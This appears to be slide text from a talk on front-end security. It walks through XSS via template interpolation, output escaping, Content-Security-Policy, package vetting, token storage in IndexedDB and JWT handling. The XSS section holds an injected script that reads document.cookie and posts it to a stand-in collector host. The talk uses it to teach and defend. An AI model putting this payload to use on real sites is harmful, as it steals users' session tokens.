Abdelrahman Awad
Software Engineer @Rasayel. Open-Source contributor.
#fff
White hat
Has permission, like penetration testers.
#888
Gray hat
Hacks for learning, usually causes no damage, and might report the findings to you.
#000
Black hat
Hacks for personal gain, and because they can.
Most importantly, why the X?
Because we already have CSS
<h1>Hello {{ audience }}</h1>
audience = "Robusta's Team";
<h1>Hello Robusta's Team</h1>
audience = "<script>alert('EZ clap');</script>";
<h1>
  Hello <script>alert('EZ clap');</script>
</h1>
audience = `<script>
  fetch(
    'http://mypasswordcollector.com/idiots',
    { method: 'post', body: document.cookie })
</script>`;
And all users' cookies, which might contain auth tokens, are now being sent to someone else.
If you must use them, make sure to sanitize the text before passing it in.
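The safe version of the "Hello {{ audience }}" template above, added here as an illustration and not taken from the talk: every interpolated value is HTML-escaped before it lands in the markup, so the injected `<script>` is displayed as text instead of being executed. The `escapeHtml` and `render` names and the `{{ name }}` placeholder syntax are assumptions for this example.

```javascript
// Added example: a minimal template renderer that HTML-escapes every
// interpolated value. `escapeHtml`, `render` and the {{ name }} syntax
// are chosen for this illustration, not taken from any framework.

const ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Escape the five characters that let text break out of an HTML text
// node or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Replace each {{ name }} with the escaped value from `context`.
// Names that are not own properties of `context` render as an empty
// string rather than leaking the placeholder or a prototype member.
function render(template, context) {
  return template.replace(/\{\{\s*(\w+)\s*\}\}/g, (_, name) =>
    Object.prototype.hasOwnProperty.call(context, name)
      ? escapeHtml(context[name])
      : "");
}

const template = "<h1>Hello {{ audience }}</h1>";

// Ordinary input renders as expected (the apostrophe is escaped too).
const friendly = render(template, { audience: "Robusta's Team" });
// -> <h1>Hello Robusta&#39;s Team</h1>

// Injected markup stays inert: the browser shows the tags as text.
const hostile = render(template, {
  audience: "<script>alert('EZ clap');</script>",
});
// -> <h1>Hello &lt;script&gt;alert(&#39;EZ clap&#39;);&lt;/script&gt;</h1>

console.log(friendly);
console.log(hostile);
```

Escaping on output is the primary defence; the CSP header discussed next is a second layer for the cases where an unescaped sink slips through.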
If you can, make use of `CSP`
The "Content-Security-Policy" header lets you define specific rules for where JavaScript may be loaded and executed from.
res.set('Content-Security-Policy', "script-src 'self' http://localhost:3000")
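To see what the header above actually does, here is a small model of how a browser applies the `script-src` directive. It is an added example, not code from the talk, and it models only the subset relevant here ('self', 'unsafe-inline', plain origin host-sources, and the fall-back to `default-src`); real CSP has many more source expressions. `scriptSources` and `isScriptAllowed` are names chosen for this example.

```javascript
// Added example: a reduced model of CSP script-src evaluation.
// Only 'self', 'unsafe-inline', host-source origins and the
// default-src fall-back are handled; everything else is treated as
// "not allowed", which is the conservative direction.

// Return the source list that governs scripts for `policy`, or null
// when the policy says nothing about scripts at all.
function scriptSources(policy) {
  const directives = policy
    .split(";")
    .map((d) => d.trim())
    .filter(Boolean);
  const pick = (name) =>
    directives.find((d) => d.split(/\s+/)[0] === name);
  const directive = pick("script-src") || pick("default-src");
  return directive ? directive.split(/\s+/).slice(1) : null;
}

// `script` is { inline: true } for a <script>…</script> written into the
// document, or { src: "http://host/file.js" } for an external file.
// `pageOrigin` is the document's origin, e.g. "http://localhost:3000".
function isScriptAllowed(policy, pageOrigin, script) {
  const sources = scriptSources(policy);
  if (sources === null) return true; // nothing restricts scripts

  if (script.inline) {
    // Inline scripts, including ones injected through XSS, run only if
    // the policy explicitly opts in with 'unsafe-inline'.
    return sources.includes("'unsafe-inline'");
  }

  const origin = new URL(script.src).origin;
  return sources.some((source) => {
    if (source === "'self'") return origin === pageOrigin;
    if (source.startsWith("'")) return false; // other keywords: not modelled
    try {
      return new URL(source).origin === origin; // host-source match
    } catch {
      return false; // scheme-sources and wildcards: not modelled
    }
  });
}

const policy = "script-src 'self' http://localhost:3000";
const pageOrigin = "http://localhost:3000";

// The injected <script> from the template example: blocked.
console.log(isScriptAllowed(policy, pageOrigin, { inline: true }));
// The app's own bundle from the same origin: allowed.
console.log(isScriptAllowed(policy, pageOrigin, { src: "http://localhost:3000/app.js" }));
// A script pulled from a host the policy never listed: blocked.
console.log(isScriptAllowed(policy, pageOrigin, { src: "https://cdn.example/lib.js" }));
```

The important observation is the inline case: with the policy from the slide, the `<script>` an attacker manages to inject into the page does not run, while the application's own bundle from `'self'` still does.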
🔃 Update packages regularly
🌟 Check Github stars
📈 Check weekly downloads
👀 Check source code
var DBOpenRequest = window.indexedDB.open("appData", 4);
DBOpenRequest.onerror = function(event) {
  console.error("Could not open appData:", event.target.error);
};
DBOpenRequest.onsuccess = function(event) {
  var db = DBOpenRequest.result;
  var transaction = db.transaction(["authData"], "readwrite");
  var objectStore = transaction.objectStore("authData");
  // Any script running on the page can issue this same lookup
  var objectStoreRequest = objectStore.get("auth_token");
  objectStoreRequest.onsuccess = function(event) {
    // send this to server
    var authToken = objectStoreRequest.result;
  };
};
Worst offender: encoding user info in JWT tokens and decoding them on the FE to get the user's identity.
The fix: treat the JWT as an opaque value. Don't assume it carries any useful information; it's just a pass you show to your API.
By Abdelrahman Awad